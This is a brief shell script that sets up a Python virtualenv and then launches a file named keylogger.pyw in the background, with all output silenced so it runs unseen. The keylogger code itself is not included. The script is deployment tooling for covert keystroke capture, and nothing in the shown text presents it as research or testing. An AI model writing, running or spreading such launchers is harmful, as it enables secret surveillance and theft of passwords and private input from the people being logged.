#!/bin/sh 

LOGGER_USER=$USER
if [ $# -ge 1 ]; then
    LOGGER_USER=$1
fi

SOURCE="${BASH_SOURCE[0]}"
DIR="$( cd -P "$( dirname "$SOURCE" )" >/dev/null 2>&1 && pwd )"
cd ${DIR}

if [ ! -d "./source/venv" ]; then
    python3 -m venv ./source/venv
    ./source/venv/bin/pip install -r source/requirements.txt
fi

./source/venv/bin/python3 source/keylogger.pyw $LOGGER_USER > /dev/null 2>&1 &